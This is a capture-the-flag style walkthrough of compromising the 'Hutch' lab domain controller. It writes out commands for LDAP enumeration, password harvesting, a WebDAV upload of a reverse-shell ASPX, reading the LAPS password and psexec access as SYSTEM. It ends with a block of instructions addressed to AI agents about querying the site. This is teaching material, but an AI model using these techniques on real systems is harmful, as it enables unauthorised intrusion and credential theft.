# Hutch ## Nmap ``` sudo nmap 192.168.89.122 -p- -sV -sS PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 80/tcp open http Microsoft IIS httpd 10.0 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2021-03-01 21:29:49Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: hutch.offsec0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) 9389/tcp open mc-nmf .NET Message Framing 49666/tcp open msrpc Microsoft Windows RPC 49668/tcp open msrpc Microsoft Windows RPC 49669/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49670/tcp open msrpc Microsoft Windows RPC 49672/tcp open msrpc Microsoft Windows RPC 49688/tcp open msrpc Microsoft Windows RPC 49767/tcp open msrpc Microsoft Windows RPC Service Info: Host: HUTCHDC; OS: Windows; CPE: cpe:/o:microsoft:windows ``` Starting off looking at LDAP running some LDAP related `nmap` scripts to enumerate. ``` nmap -n -sV --script "ldap* and not brute" 192.168.89.122 ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-e9df9743199e5fe3cd5932b1078199b6ffd44261%2Fimage.png?alt=media) Looking through the results we do not have much interesting information but we do have the naming connect off hutch.offsec for the DC. Having this information we can run LDAP search with the naming context included to enumerate users and `grep` by SAM account name. ``` ldapsearch -x -h 192.168.89.122 -D '' -w '' -b "DC=hutch,DC=offsec" | grep sAMAccountName: ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-68e04b8db9247636ac3b93e190a53bae8438edd8%2Fimage.png?alt=media) We now have the following users list: ``` rplacidi opatry ltaunton acostello jsparwell oknee jmckendry avictoria jfrarey eaburrow cluddy agitthouse fmcsorley ``` Running the same LDAP command as above except this time grepping for the description we see the following: ``` ldapsearch -x -h 192.168.89.122 -D '' -w '' -b "DC=hutch,DC=offsec" | grep description ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a50e0b6fc49d2bd74e94b9dc271a9fefb285403b%2Fimage.png?alt=media) We have a password in the last line which we can correlate with being the last users in the entry list of fmcsorley for the combined credentials of `fmcsorley:CrabSharkJellyfish192` Checking the credentials with `crackmpaexec` against SMB shows we have valid information. ``` crackmapexec smb 192.168.89.122 -u fmcsorley -p CrabSharkJellyfish192 ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ce79d170331509facda0506b734f4384819ef814%2Fimage.png?alt=media) With valid SMB credentials I was unable to enumerate any further interesting information. From the Nikto results earlier we do have Webdav enabled. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-fa38f976ae9587063bb21b6e8935306223fd768f%2Fimage.png?alt=media) Without a specific directory enabled we can attempt to upload with curl on the root page. I first created a `msfvenom` ASPX reverse shell then attempted to upload with `curl` ensuring the valid credentials we have are used. ``` curl -T '/home/kali/shell.aspx' 'http://192.168.64.122/' -u fmcsorley:CrabSharkJellyfish192 ``` I set the shell to talk back on port 445 and set a `netcat` listener on the same port. After browsing to 192.168.64.122/shell.aspx I received a shell back on my listener. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d5a7aac8722a065552d5d2e72d7a305ce77233c4%2Fimage.png?alt=media) After going through the system we do see that LAPS has been installed on the server. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-32e55a33ef0393d8f20d7d86f0fa02e928cc6273%2Fimage.png?alt=media) Its possible that LAPS or LDAP has been misconfigured enough to potentially contains the computer passwords for computer object in AD. Knowing this we can go back and search LDAP with the credentials with have specifically looking for the *ms-Mcs-AdmPwd attribute.* ``` ldapsearch -x -h 192.168.64.122 -D 'hutch\fmcsorley' -w 'CrabSharkJellyfish192' -b 'dc=hutch,dc=offsec' "(ms-MCS-AdmPwd=*)" ms-MCS-AdmPwd ``` ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6ed473804962f2dd92e76f3fc3b2ac9dbc4f14f5%2Fimage.png?alt=media) We can see for the domain controller the LAPS password set is `J6QOuU+lhs[SH/` I then confirmed the credentials with `crackmapexec` against LDAP using the local administrator account and was given successful confirmation. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-3ffcfbb6f3a83ebcaa73a6ecb44cfed773ed6889%2Fimage.png?alt=media) I was then able to use these credentials with Impacket's psexec.py to gain access to the Domain Controller as SYSTEM. ![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-c9eaa95e693bfe14613461611b4da9f1e9266d09%2Fimage.png?alt=media) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://viperone.gitbook.io/pentest-everything/writeups/pg-practice/windows/hutch.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.